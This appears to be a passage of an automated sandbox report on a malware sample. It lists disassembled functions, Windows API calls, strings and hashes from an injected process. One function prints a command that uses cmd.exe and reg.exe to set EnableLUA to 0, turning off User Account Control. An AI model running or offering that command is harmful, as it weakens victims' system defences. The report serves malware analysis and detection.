                                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                Function 00456C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: @^E
                                                                                                • API String ID: 269201875-2908066071
                                                                                                • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                Strings
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                Function 0041384F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,RG), ref: 0041385A
                                                                                                • RegSetValueExW.ADVAPI32(RG,?,00000000,00000001,00000000,00000000,00475300,?,0040F85E,pth_unenc,004752E8), ref: 00413888
                                                                                                • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,004752E8), ref: 00413893
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc$RG
                                                                                                • API String ID: 1818849710-3487042679
                                                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                Strings
                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                • API String ID: 3024135584-2418719853
                                                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 4269425633-0
                                                                                                • Opcode ID: 866a9b1e4ffb2fe11a485c7d130434491588eddee0820b45772aa9f40dec603a
                                                                                                • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                                                                                • Opcode Fuzzy Hash: 866a9b1e4ffb2fe11a485c7d130434491588eddee0820b45772aa9f40dec603a
                                                                                                • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                • __freea.LIBCMT ref: 0045129D
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                • _free.LIBCMT ref: 0044F43F
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                • _free.LIBCMT ref: 00448353
                                                                                                • _free.LIBCMT ref: 0044837A
                                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00450A54
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 00450A66
                                                                                                • _free.LIBCMT ref: 00450A78
                                                                                                • _free.LIBCMT ref: 00450A8A
                                                                                                • _free.LIBCMT ref: 00450A9C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00444106
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 00444118
                                                                                                • _free.LIBCMT ref: 0044412B
                                                                                                • _free.LIBCMT ref: 0044413C
                                                                                                • _free.LIBCMT ref: 0044414D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                Function 00417627 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                                                                • IsWindowVisible.USER32(?), ref: 00417677
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                • String ID: (VG
                                                                                                • API String ID: 3142014140-3443974315
                                                                                                • Opcode ID: 1eb1944e6159cbb4b45bba5d5be6f73293273ea23ff7ee5c339c4291de23ad78
                                                                                                • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                                                                • Opcode Fuzzy Hash: 1eb1944e6159cbb4b45bba5d5be6f73293273ea23ff7ee5c339c4291de23ad78
                                                                                                • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
